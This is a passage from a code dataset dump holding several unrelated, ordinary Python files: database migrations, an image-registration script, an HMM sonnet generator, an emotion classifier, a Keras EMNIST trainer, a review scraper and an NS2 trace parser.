size\n","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426507718","text":"\"\"\"initial migration\n\nRevision ID: daea515a48ac\nRevises: \nCreate Date: 2020-12-16 13:36:41.978746\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'daea515a48ac'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('inbox',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('outbox',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('roles',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('sender_id', sa.Integer(), nullable=True),\n sa.Column('recipient_id', sa.Integer(), nullable=True),\n sa.Column('read_yn', sa.Boolean(), nullable=True),\n sa.Column('sender_deleted', sa.Boolean(), nullable=True),\n sa.Column('reciever_deleted', sa.Boolean(), nullable=True),\n sa.Column('date', sa.DateTime(), nullable=True),\n sa.Column('title', sa.String(length=100), nullable=True),\n sa.Column('message', sa.String(length=500), nullable=True),\n sa.ForeignKeyConstraint(['recipient_id'], ['inbox.id'], ),\n sa.ForeignKeyConstraint(['sender_id'], ['outbox.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('role_id', sa.Integer(), nullable=True),\n sa.Column('date_joined', sa.Date(), nullable=True),\n sa.Column('inbox_id', sa.Integer(), nullable=True),\n sa.Column('outbox_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['inbox_id'], ['inbox.id'], ),\n sa.ForeignKeyConstraint(['outbox_id'], ['outbox.id'], ),\n sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_username'), 'users', ['username'], unique=True)\n op.create_table('posts',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('poster_id', sa.Integer(), nullable=True),\n sa.Column('title', sa.String(length=100), nullable=True),\n sa.Column('description', sa.String(length=500), nullable=True),\n sa.Column('budget', sa.String(length=10), nullable=True),\n sa.Column('hourlypay', sa.String(length=10), nullable=True),\n sa.ForeignKeyConstraint(['poster_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('posts')\n op.drop_index(op.f('ix_users_username'), table_name='users')\n op.drop_table('users')\n op.drop_table('messages')\n op.drop_table('roles')\n op.drop_table('outbox')\n op.drop_table('inbox')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/daea515a48ac_initial_migration.py","file_name":"daea515a48ac_initial_migration.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102026168","text":"# Register all training volumes to 0007.nii.gz. No resizing in this version\n\nimport ants\nimport os\n\n# Constants for path names\nFIXED_IMG = \"/content/drive/My Drive/cs8395_deep_learning/assignment3/data/Train/img/0007.nii.gz\"\nOLD_TEST_IMG = \"/content/drive/My Drive/cs8395_deep_learning/assignment3/data/Testing/img/\"\nNEW_TEST_IMG = \"/content/drive/My Drive/cs8395_deep_learning/assignment3/data/Testing/img_registered_rigid/\"\n\n# Load in fixed image\nfixed = ants.image_read(FIXED_IMG)\n\n# Register all the testing images\nfor file_name in os.listdir(OLD_TEST_IMG):\n # Load in moving image\n moving_image = ants.image_read(OLD_TEST_IMG + file_name)\n print(\"Registering \", file_name)\n # Perform registration\n transform = ants.registration(fixed=fixed , moving=moving_image,\n type_of_transform='QuickRigid', random_seed=0)\n transformed_image = ants.apply_transforms( fixed=fixed, moving=moving_image,\n transformlist=transform['fwdtransforms'],\n interpolator='nearestNeighbor')\n # Save transformed image\n print(\"Saving \", file_name)\n transformed_image.to_file(NEW_TEST_IMG + file_name)","sub_path":"homework/assignment3/bin/test_preprocessing/register_rigid.py","file_name":"register_rigid.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"322104208","text":"from HMM import unsupervised_HMM\nfrom preprocessing import processed_shakespeare_data\nfrom preprocessing import processed_shakespeare_data2\nimport random\nfrom preprocessing import punctuation_freq_shakespeare\n\ndef ten_syllables_rhyme_generator(n_states, N_iters, k, train_on='line'):\n '''\n Trains an HMM using unsupervised learning and generates k 14-line sonnets.\n\n Arguments:\n k: Number of sonnets to generate.\n n_states: Number of hidden states that the HMM should have.\n N_iters: Number of iterations for the unsupervised learning\n (EM algorithm)\n train_on: Optional argument. Train on either line or sonnet.\n Default to line.\n '''\n # Data to train on from pre-processing.\n data, words_list, syllables, end_syllables, rhyme_dict, stress_dict = \\\n processed_shakespeare_data2()\n\n # If train on sonnet instead of line.\n if train_on == 'sonnet':\n data, words_list, syllables, end_syllables = \\\n processed_shakespeare_data()\n\n print('Training unsupervised HMM...')\n\n f = open('output/10_syllables_rhyme.txt', 'a+')\n\n print('(%d states, %d iterations, training on each %s)\\n\\n' % \\\n (n_states, N_iters, train_on))\n f.write('(%d states, %d iterations, training on each %s)\\n\\n\\n' % \\\n (n_states, N_iters, train_on))\n\n # Train the HMM.\n HMM = unsupervised_HMM(data, n_states, N_iters)\n\n # Generate k input sequences.\n for i in range(k):\n\n # Generate a 14-line sonnet\n sonnet_lines = HMM.generate_sonnet_rhyme(words_list, syllables, \\\n end_syllables, rhyme_dict)\n punct_marks, punct_freq = punctuation_freq_shakespeare()\n\n print('\\n\\nSonnet # ' + str(i + 1))\n\n # Print the results.\n for s, emission in enumerate(sonnet_lines):\n if s == 13:\n # Last line of sonnet ends with period.\n line = ' '.join([words_list[j] for j in emission])+ '.'\n line = line[0].upper() + line[1:]\n print(line)\n f.write(line)\n else:\n line = ' '.join([words_list[j] for j in emission]) + \\\n random.choices(punct_marks, weights=punct_freq)[0]\n line = line[0].upper() + line[1:]\n # Add some punctuation to the end of every sentence\n print(line)\n f.write(line)\n f.write('\\n')\n f.write('\\n\\n')\n\n f.close()\n\n print('')\n print('')\n\nif __name__ == '__main__':\n print('')\n print('')\n print(\"#\" * 70)\n print(\"{:^70}\".format(\"Generating Rhyming Sonnets with 10-Syllable Lines\"))\n print(\"#\" * 70)\n print('')\n print('')\n\n n_states = 100\n N_iters = 20\n k = 3\n\n ten_syllables_rhyme_generator(n_states, N_iters, k, train_on='line')\n","sub_path":"10_syllables_rhyme.py","file_name":"10_syllables_rhyme.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414855481","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0003_news_date'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='news',\n options={'get_latest_by': 'date', 'verbose_name_plural': 'News'},\n ),\n migrations.AlterField(\n model_name='news',\n name='date',\n field=models.DateField(default=datetime.datetime(2014, 10, 22, 18, 32, 29, 552167)),\n ),\n ]\n","sub_path":"news/migrations/0004_auto_20141022_1832.py","file_name":"0004_auto_20141022_1832.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"160840194","text":"import os\nimport shutil\nfrom tqdm import tqdm\nimport time\n\nfrom .base import BaseAligner, TEMP_DIR, TriphoneFmllrConfig, TriphoneConfig\n\nfrom ..dictionary import Dictionary\n\nfrom ..multiprocessing import (align, calc_fmllr, make_path_safe,thirdparty_binary, subprocess,convert_ali_to_textgrids)\n\nclass PretrainedAligner(BaseAligner):\n '''\n Class for aligning a dataset using a pretrained acoustic model\n\n Parameters\n ----------\n archive : :class:`~aligner.archive.Archive`\n Archive containing the acoustic model and pronunciation dictionary\n corpus : :class:`~aligner.corpus.Corpus`\n Corpus object for the dataset\n output_directory : str\n Path to directory to save TextGrids\n temp_directory : str, optional\n Specifies the temporary directory root to save files need for Kaldi.\n If not specified, it will be set to ``~/Documents/MFA``\n num_jobs : int, optional\n Number of processes to use, defaults to 3\n call_back : callable, optional\n Specifies a call back function for alignment\n '''\n def __init__(self, archive, corpus, output_directory,\n temp_directory = None, num_jobs = 3, speaker_independent = False,\n call_back = None):\n\n if temp_directory is None:\n temp_directory = TEMP_DIR\n self.temp_directory = temp_directory\n self.output_directory = output_directory\n self.corpus = corpus\n self.speaker_independent = speaker_independent\n self.dictionary = Dictionary(archive.dictionary_path, os.path.join(temp_directory, 'dictionary'), word_set=corpus.word_set)\n\n self.dictionary.write()\n archive.export_triphone_model(self.tri_directory)\n\n if self.corpus.num_jobs != num_jobs:\n num_jobs = self.corpus.num_jobs\n self.num_jobs = num_jobs\n self.call_back = call_back\n if self.call_back is None:\n self.call_back = print\n self.verbose = False\n self.tri_fmllr_config = TriphoneFmllrConfig(**{'realign_iters': [1, 2],\n 'fmllr_iters': [1],\n 'num_iters': 3,\n #'boost_silence': 0\n })\n self.tri_config = TriphoneConfig()\n\n def do_align(self):\n '''\n Perform alignment while calculating speaker transforms (fMLLR estimation)\n '''\n self._init_tri()\n if not self.speaker_independent:\n self.train_tri_fmllr()\n\n def _align_fmllr(self):\n '''\n Align the dataset using speaker-adapted transforms\n '''\n model_directory = self.tri_directory\n output_directory = self.tri_ali_directory\n self._align_si(fmllr = False)\n sil_phones = self.dictionary.silence_csl\n\n log_dir = os.path.join(output_directory, 'log')\n os.makedirs(log_dir, exist_ok = True)\n if not self.speaker_independent:\n calc_fmllr(output_directory, self.corpus.split_directory,\n sil_phones, self.num_jobs, self.tri_fmllr_config, initial = True)\n optional_silence = self.dictionary.optional_silence_csl\n align(0, output_directory, self.corpus.split_directory,\n optional_silence, self.num_jobs, self.tri_fmllr_config)\n\n def _init_tri(self):\n if not os.path.exists(self.tri_ali_directory):\n self._align_fmllr()\n if self.speaker_independent:\n return\n os.makedirs(os.path.join(self.tri_fmllr_directory, 'log'), exist_ok = True)\n begin = time.time()\n self.corpus.setup_splits(self.dictionary)\n shutil.copy(os.path.join(self.tri_directory,'final.mdl'),\n os.path.join(self.tri_fmllr_directory,'1.mdl'))\n for i in range(self.num_jobs):\n shutil.copy(os.path.join(self.tri_ali_directory, 'fsts.{}'.format(i)),\n os.path.join(self.tri_fmllr_directory, 'fsts.{}'.format(i)))\n shutil.copy(os.path.join(self.tri_ali_directory, 'trans.{}'.format(i)),\n os.path.join(self.tri_fmllr_directory, 'trans.{}'.format(i)))\n\n def train_tri_fmllr(self):\n directory = self.tri_fmllr_directory\n sil_phones = self.dictionary.silence_csl\n if self.call_back == print:\n iters = tqdm(range(1, self.tri_fmllr_config.num_iters))\n else:\n iters = range(1, self.tri_fmllr_config.num_iters)\n log_directory = os.path.join(directory, 'log')\n for i in iters:\n model_path = os.path.join(directory,'{}.mdl'.format(i))\n occs_path = os.path.join(directory, '{}.occs'.format(i+1))\n next_model_path = os.path.join(directory,'{}.mdl'.format(i+1))\n if os.path.exists(next_model_path):\n continue\n align(i, directory, self.corpus.split_directory,\n self.dictionary.optional_silence_csl,\n self.num_jobs, self.tri_fmllr_config)\n calc_fmllr(directory, self.corpus.split_directory, sil_phones,\n self.num_jobs, self.tri_fmllr_config, initial = False, iteration = i)\n os.rename(model_path, next_model_path)\n self.parse_log_directory(log_directory, i)\n os.rename(next_model_path, os.path.join(directory,'final.mdl'))\n\n def export_textgrids(self):\n '''\n Export a TextGrid file for every sound file in the dataset\n '''\n if self.speaker_independent:\n model_directory = self.tri_ali_directory\n else:\n model_directory = self.tri_fmllr_directory\n convert_ali_to_textgrids(self.output_directory, model_directory, self.dictionary,\n self.corpus, self.num_jobs)\n","sub_path":"aligner/aligner/pretrained.py","file_name":"pretrained.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455897944","text":"import random\n\nmyslovar={\n'vesh':['йо', 'камон', 'бичез'],\n'animals':['кошка','собака','какаду']\n}\nmyzadachi={\n'first':'нарисуй {animals}',\n'second':'нарисуй {animals} с ногой',\n'third':'нарисуй {animals} с ногой в кепке'\n}\ndef newslovar(slovar,zadachi):\n\n superslovar={}\n for zadacha in zadachi:\n print (zadacha)\n print (zadachi[zadacha])\n fratha=zadachi[zadacha]\n for slovo in slovar:\n print(slovo)\n if '{'+slovo+'}' in fratha:\n print('слово подошло')\n gener=slovar[slovo][random.randint(0,2)]\n otvet=fratha.format(**{slovo:gener})\n break\n else:\n print('не подощло')\n otvet='poshel nah'\n superslovar[zadacha]=otvet\n return superslovar\n\notvetik=newslovar(myslovar,myzadachi)\nprint(otvetik)\n","sub_path":"shablon.py","file_name":"shablon.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47893702","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Use torchMoji to predict emojis from a single text input\n\"\"\"\n\nfrom __future__ import print_function, division, unicode_literals\nimport example_helper\nimport json\nimport csv\nimport argparse\nimport unidecode\n\nimport numpy as np\nimport emoji\n\nfrom torchmoji.sentence_tokenizer import SentenceTokenizer\nfrom torchmoji.model_def import torchmoji_emojis\nfrom torchmoji.global_variables import PRETRAINED_PATH, VOCAB_PATH\n\n# Emoji map in emoji_overview.png\nEMOJIS = \":joy: :unamused: :weary: :sob: :heart_eyes: \\\n:pensive: :ok_hand: :blush: :heart: :smirk: \\\n:grin: :notes: :flushed: :100: :sleeping: \\\n:relieved: :relaxed: :raised_hands: :two_hearts: :expressionless: \\\n:sweat_smile: :pray: :confused: :kissing_heart: :heartbeat: \\\n:neutral_face: :information_desk_person: :disappointed: :see_no_evil: :tired_face: \\\n:v: :sunglasses: :rage: :thumbsup: :cry: \\\n:sleepy: :yum: :triumph: :hand: :mask: \\\n:clap: :eyes: :gun: :persevere: :smiling_imp: \\\n:sweat: :broken_heart: :yellow_heart: :musical_note: :speak_no_evil: \\\n:wink: :skull: :confounded: :smile: :stuck_out_tongue_winking_eye: \\\n:angry: :no_good: :muscle: :facepunch: :purple_heart: \\\n:sparkling_heart: :blue_heart: :grimacing: :sparkles:\".split(' ')\n\n'''\n# Finer gradient emotions\nEMOTIONS = \"funny unamused frustrated sad delight \\\npensive :ok_hand happy love :smirk \\\nexcited :notes surprise :100 tired \\\nhappy very_happy :raised_hands supportive annoyance \\\nembarassed request unhappy happy :heartbeat \\\n:neutral_face :information_desk_person disappointed :see_no_evil :tired_face \\\n:v :sunglasses rage :thumbsup :cry \\\n:sleepy :yum :triumph :hand :mask \\\n:clap :eyes :gun :persevere :smiling_imp \\\n:sweat :broken_heart :yellow_heart :musical_note :speak_no_evil \\\n:wink :skull :confounded smile stuck_out_tongue_winking_eye \\\nangry no_good muscle facepunch purple_heart \\\nsparkling_heart blue_heart grimacing sparkles\".split(' ')\n'''\n\nEMOTIONS = \"positive negative negative negative positive \\\nnegative positive positive positive positive \\\nexcited positive surprise positive negative \\\npositive positive negative positive negative \\\nnegative positive negative positive positive \\\nnegative positive negative positive negative \\\nnegative positive negative positive negative \\\nnegative positive negative negative negative \\\n:clap :eyes :gun :persevere :smiling_imp \\\n:sweat :broken_heart :yellow_heart :musical_note :speak_no_evil \\\n:wink :skull :confounded smile stuck_out_tongue_winking_eye \\\nangry no_good muscle facepunch purple_heart \\\nsparkling_heart blue_heart grimacing sparkles\".split(' ')\n\ndef top_elements(array, k):\n ind = np.argpartition(array, -k)[-k:]\n return ind[np.argsort(array[ind])][::-1]\n\nif __name__ == \"__main__\":\n # argparser = argparse.ArgumentParser()\n # argparser.add_argument('--text', type=str, required=True, help=\"Input text to emojize\")\n # argparser.add_argument('--maxlen', type=int, default=30, help=\"Max length of input text\")\n # args = argparser.parse_args()\n\n OUTPUT_PATH = 'test_sentences.csv'\n\n with open('preprocessed-twitter-tweets/processedNeutral.csv', 'r') as f:\n reader = csv.reader(f)\n test_sentences = list(reader)\n\n for sentence in test_sentences[0]:\n if len(sentence) == 0:\n sentence = 'i'\n\n print(f'test_sentences length: {len(test_sentences[0])}')\n\n # Tokenizing using dictionary\n with open(VOCAB_PATH, 'r') as f:\n vocabulary = json.load(f)\n\n #st = SentenceTokenizer(vocabulary, args.maxlen)\n st = SentenceTokenizer(vocabulary, 500)\n\n # Loading model\n model = torchmoji_emojis(PRETRAINED_PATH)\n # Running predictions\n # Determines the important words in the sentence\n #tokenized, _, _ = st.tokenize_sentences([args.text])\n tokenized, _, _ = st.tokenize_sentences(test_sentences[0])\n #print(f'tokenized words: {tokenized}')\n # Get sentence probability\n #prob = model(tokenized)[0]\n print(f'tokenized: {tokenized}')\n prob = model(tokenized)\n\n for prob in [prob]:\n # Find top emojis for each sentence. Emoji ids (0-63)\n # correspond to the mapping in emoji_overview.png\n # at the root of the torchMoji repo.\n #print(f'prob:{prob}')\n print('Writing results to {}'.format(OUTPUT_PATH))\n scores = []\n print(f'prob: {prob}')\n for i, t in enumerate(test_sentences[0]):\n t_tokens = tokenized[i]\n t_score = [t]\n t_prob = prob[i]\n ind_top = top_elements(t_prob, 5)\n t_score.append(sum(t_prob[ind_top]))\n t_score.extend(ind_top)\n t_score.extend([t_prob[ind] for ind in ind_top])\n scores.append(t_score)\n #print(t_score)\n\n with open(OUTPUT_PATH, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=str(','), lineterminator='\\n')\n writer.writerow(['Text', 'Top5%',\n 'Emoji_1', 'Emoji_2', 'Emoji_3', 'Emoji_4', 'Emoji_5',\n 'Pct_1', 'Pct_2', 'Pct_3', 'Pct_4', 'Pct_5'])\n for i, row in enumerate(scores):\n try:\n writer.writerow(row)\n except:\n print(\"Exception at row {}!\".format(i))\n\n '''\n Single sentence mapping\n # Top emotion id\n emotion_ids = top_elements(prob, 5)\n print(f'top five emotion ids: {emotion_ids}')\n\n # map to emotions\n emotions = map(lambda x: EMOTIONS[x], emotion_ids)\n print(f'emojis: {list(emotions)}')\n #print(emotion.emojize(\"{} {}\".format(args.text,' '.join(emojis)), use_aliases=True))\n '''\n\n","sub_path":"nlp-emotions/examples/text_emotions.py","file_name":"text_emotions.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588877207","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\gsi_handlers\\object_lost_and_found_service_handlers.py\n# Compiled at: 2018-10-26 00:20:22\n# Size of source mod 2**32: 4629 bytes\nfrom sims4.gsi.dispatcher import GsiHandler\nfrom sims4.gsi.schema import GsiGridSchema\nimport services\nolaf_service_objects_schema = GsiGridSchema(label='Object Lost & Found')\nolaf_service_objects_schema.add_field('object', label='Object')\nolaf_service_objects_schema.add_field('zone', label='Zone')\nolaf_service_objects_schema.add_field('street', label='Street')\nolaf_service_objects_schema.add_field('sim', label='Sim')\nolaf_service_objects_schema.add_field('household', label='Household')\nolaf_service_deleted_clone_schema = GsiGridSchema(label='Object Lost & Found/To Be Deleted')\nolaf_service_deleted_clone_schema.add_field('object', label='Object')\nolaf_service_deleted_clone_schema.add_field('zone', label='Zone')\nolaf_service_deleted_clone_schema.add_field('street', label='Street')\n\ndef _olaf_zone_str(zone_id, zone):\n if zone:\n return '{}:{}'.format(str(zone), zone.lot.get_lot_name())\n return str(zone_id)\n\n\ndef _olaf_obj_str(zone, object_id):\n obj_str = str(object_id)\n if zone is not None:\n if zone.is_instantiated:\n obj = zone.object_manager.get(object_id)\n if obj:\n obj_str = str(obj)\n return obj_str\n\n\n@GsiHandler('object_lost_and_found_service_objects', olaf_service_objects_schema)\ndef generate_object_lost_and_found_service_data(*args, zone_id: int=None, filter=None, **kwargs):\n lost_and_found = services.get_object_lost_and_found_service()\n zone_manager = services.get_zone_manager()\n sim_info_manager = services.sim_info_manager()\n household_manager = services.household_manager()\n if not (lost_and_found and zone_manager and sim_info_manager and household_manager):\n return []\n registered_objects = []\n for locator in lost_and_found.registered_object_locators:\n if zone_id is not None:\n if zone_id != locator.zone_id:\n continue\n zone = zone_manager.get(locator.zone_id)\n sim_str = str(locator.sim_id)\n sim_info = sim_info_manager.get(locator.sim_id)\n if sim_info:\n sim_str = '{}:{}'.format(str(sim_info), locator.sim_id)\n household_str = str(locator.household_id)\n household = household_manager.get(locator.household_id)\n if household:\n household_str = '{}:{}'.format(household.name, locator.household_id)\n registered_objects.append({'object':_olaf_obj_str(zone, locator.object_id), \n 'zone':_olaf_zone_str(locator.zone_id, zone), \n 'street':locator.open_street_id, \n 'sim':sim_str, \n 'household':household_str})\n\n return registered_objects\n\n\n@GsiHandler('object_lost_and_found_service_clones', olaf_service_deleted_clone_schema)\ndef generate_olaf_service_deleted_clone_schema_data(*args, zone_id: int=None, filter=None, **kwargs):\n lost_and_found = services.get_object_lost_and_found_service()\n zone_manager = services.get_zone_manager()\n return lost_and_found and zone_manager or []\n clones_to_delete_by_zone = lost_and_found.clones_to_delete_by_zone\n clones_to_delete_by_street = lost_and_found.clones_to_delete_by_street\n clones_to_delete = []\n object_ids = set()\n for zone_id, objects in clones_to_delete_by_zone.items():\n if zone_id is not None:\n if zone_id != zone_id:\n continue\n zone = zone_manager.get(zone_id)\n for object_id in objects:\n street_str = 'n/a'\n for street_id, objects in clones_to_delete_by_street.items():\n if object_id in objects:\n street_str = str(street_id)\n break\n\n clones_to_delete.append({'object':_olaf_obj_str(zone, object_id), \n 'zone':_olaf_zone_str(zone_id, zone), \n 'street':street_str})\n object_ids.add(object_id)\n\n if zone_id is None:\n for street_id, objects in clones_to_delete_by_street.items():\n for object_id in objects:\n if object_id in object_ids:\n continue\n clones_to_delete.append({'object':_olaf_obj_str(services.current_zone(), object_id), \n 'zone':'n/a', \n 'street':street_id})\n\n return clones_to_delete","sub_path":"Scripts/simulation/gsi_handlers/object_lost_and_found_service_handlers.py","file_name":"object_lost_and_found_service_handlers.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"566440218","text":"import os\n\nfrom app.create_app import create_app\n\nDEBUG = os.getenv(\"DEBUG\", \"\").lower() in (\"true\", \"1\")\nHOST = os.getenv(\"HOST\", \"127.0.0.1\")\nPORT = int(os.getenv(\"PORT\", \"80\"))\napp = create_app()\n\nif __name__ == \"__main__\":\n app.run(host=HOST, debug=DEBUG, port=PORT)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179271319","text":"\r\nfrom __future__ import print_function\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras import backend as K\r\nfrom keras.datasets import mnist\r\nfrom mnist import MNIST\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import load_model\r\nfrom keras.models import model_from_json\r\n\r\n\r\n\r\nimg_rows, img_cols = 28, 28\r\n\r\nemnist_data = MNIST(path='data1\\\\', return_type='numpy')\r\nemnist_data.select_emnist('letters')\r\nX, y = emnist_data.load_training()\r\n\r\n\r\nX = X.reshape(124800, 28, 28)\r\ny = y.reshape(124800, 1)\r\n\r\ny = y-1\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=111)\r\n\r\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\r\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\r\ninput_shape = (img_rows, img_cols, 1)\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\n\r\n\r\nx_train /= 255\r\nx_test /= 255\r\nbatch_size = 128\r\nnum_classes = 26\r\nepochs = 10\r\n\r\n\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, kernel_size=(3, 3),\r\n activation='relu',\r\n input_shape=input_shape))\r\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\n\r\nmodel.compile(loss=keras.losses.categorical_crossentropy,\r\n optimizer=keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\n\r\n\r\n\r\nmodel.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(x_test, y_test))\r\n# Save the model weights for future reference\r\nmodel_json = model.to_json()\r\nwith open(\"training_model.json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\nmodel.save('training_model.h5')\r\n\r\n\r\nscore = model.evaluate(x_test, y_test, verbose=0)\r\nprint('Test loss:', score[0])\r\nprint('Test accuracy:', score[1])","sub_path":"model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426792032","text":"import requests\nfrom bs4 import BeautifulSoup, NavigableString\n\n\ndef get_review_text(block):\n \"\"\"Get just the text of a review from it's DIV\"\"\"\n strings = []\n for possible_text in block.children:\n if isinstance(possible_text, NavigableString):\n stripped_text = possible_text.strip()\n if len(stripped_text) > 0:\n strings.append(stripped_text)\n return \"\\n\".join(strings)\n\n\ndef get_review_texts(review_html):\n \"\"\"Get all the reviews on a review page\"\"\"\n soup = BeautifulSoup(review_html)\n table = soup.find(id=\"productReviews\").tr.td\n review_blocks = table.find_all(\"div\", recursive=False)\n return [get_review_text(block) for block in review_blocks]\n\n\ndef get_review_page_count(review_html):\n \"\"\"Get the number of review pages\"\"\"\n soup = BeautifulSoup(review_html)\n try:\n return int(soup.find(\"span\", class_=\"paging\").find_all(\"a\")[-2].text)\n except:\n return 1\n\n\ndef get_all_reviews(review_url):\n \"\"\"Get all the reviews, given a review page URL\"\"\"\n # sanitize the url\n review_url = \"/\".join(review_url.split(\"/\")[:-1])\n\n first_review_page = requests.get(review_url).text\n review_page_count = get_review_page_count(first_review_page)\n reviews = []\n for i in range(1, review_page_count + 1):\n url = review_url + \"?pageNumber=%d\" % i\n review_html = requests.get(url).text\n reviews.extend(get_review_texts(review_html))\n return reviews","sub_path":"all-gists/5041434/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640660887","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Duygu Bulut - b181210374\r\n & \r\n Merve Bacak - b161210050\r\n\"\"\"\r\n#her sütun için gerekli bilgilerin tutulacağı listeler\r\nall_events = [] \r\nall_times = []\r\nall_from_nodes = []\r\nall_to_nodes = []\r\nall_pkt_type = []\r\nall_pkt_size = []\r\nall_flags = []\r\nall_fids = []\r\nall_src_addr = []\r\nall_dest_addr = []\r\nall_seq_nums =[]\r\nall_pktid = []\r\n\r\n'''tracefile'daki her bir sütunu elde etmek için dosyayı okurken\r\nboşluklara gore parse edildi.'''\r\nimport codecs\r\nwith codecs.open(\"iz.tr\", \"r\", \"UTF8\") as my_trace_file:\r\n my_trace_file=my_trace_file.readlines()\r\n \r\nfor line in my_trace_file:\r\n \r\n item = line.split(\" \");\r\n #elde edilen sütun bilgileri oluşturulan listelere atıldı.\r\n all_events.append(item[0])\r\n all_times.append(item[1])\r\n all_from_nodes.append(item[2]) \r\n all_to_nodes.append(item[3]) \r\n all_pkt_type.append(item[4]) \r\n all_pkt_size.append(item[5]) \r\n all_flags.append(item[6]) \r\n all_fids.append(item[7]) \r\n all_src_addr.append(item[8]) \r\n all_dest_addr.append(item[9]) \r\n all_seq_nums.append(item[10]) \r\n all_pktid.append(item[11]) \r\n \r\n'''dosya okunurken string olarak okunduğu için \r\nsayısal olan değerleri islem yapabilmek icin donusturmek gerekiyor.'''\r\nall_times_f = [] # times float tipine donusecek\r\n\r\n#zamanı floata cevirmek icin\r\nfor i in all_times:\r\n all_times_f.append(float(i))\r\n \r\n #veriyi dataframe'e donusturmek icin pandas import edildi \r\nimport pandas as pd\r\n\r\n#elde edilen listeler dataframe'e atıldı\r\ndata = {'event': all_events,\r\n 'times': all_times_f,\r\n 'from_nodes' : all_from_nodes,\r\n 'to_nodes' : all_to_nodes,\r\n 'pkt_type' : 